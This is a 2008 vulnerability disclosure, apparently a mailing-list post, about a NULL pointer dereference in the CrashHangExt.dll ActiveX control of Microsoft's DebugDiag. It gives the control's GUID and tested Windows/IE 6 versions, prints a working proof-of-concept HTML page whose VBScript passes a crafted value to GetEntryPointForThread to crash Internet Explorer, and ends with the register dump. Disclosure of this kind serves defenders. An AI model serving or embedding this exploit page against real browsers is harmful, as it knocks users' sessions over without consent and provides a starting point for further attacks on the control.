DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference Oct 30 2008 09:57AM
crimson loyd gmail com
Name : DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference

Credit : suN8Hclf (DaRk-CodeRs Group), crimson.loyd (at) gmail (dot) com

Download : http://www.microsoft.com/downloads/details.aspx?FamilyID=28bd5941-c458-46f1-b24d-f60151d875a3&displaylang=en#Overview

Greetz : Luigi Auriemma, Louis Carriere, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Myo

Katharsis, all from #dark-coders

=+ Product of Fuzzing +=

This code should crash Internet Explorer

Tested on:

+ Windows XP SP2 (fully patched) & IE 6.0 (fully patched)

+ Windows 2000 SP 4 (fully patched) & IE 6.0 (fully patched)

Marked as:

================================================
Class Utils
GUID: {7233D6F8-AD31-440F-BAF0-9E7A292A53DA}
Number of Interfaces: 1
Default Interface: IUtils
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
================================================

Exploit:

~~~~~~~~~~~~~~~~~~~~~~

-----------------------code.htm--------------------------
<body>
<object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' />
</object>
<script language='vbscript'>
arg1=-2147483647
target.GetEntryPointForThread arg1
</script>
</body>
-----------------------code.htm--------------------------

Info

~~~~~~~~~~~~~~~~~~~~~~

EAX 00000000
ECX 0012DDDC
EDX 001E98EA
EBX 02C318E8 CrashHan.02C318E8
ESP 0012DD88
EBP 0012DE04
ESI 023F1FE0
EDI 00000000
EIP 02C38290 CrashHan.02C38290

IE crashes while trying to execute this line (Null pointer dereference):

02C38290 8B08 MOV ECX,DWORD PTR DS:[EAX]

//www.dark-coders.pl
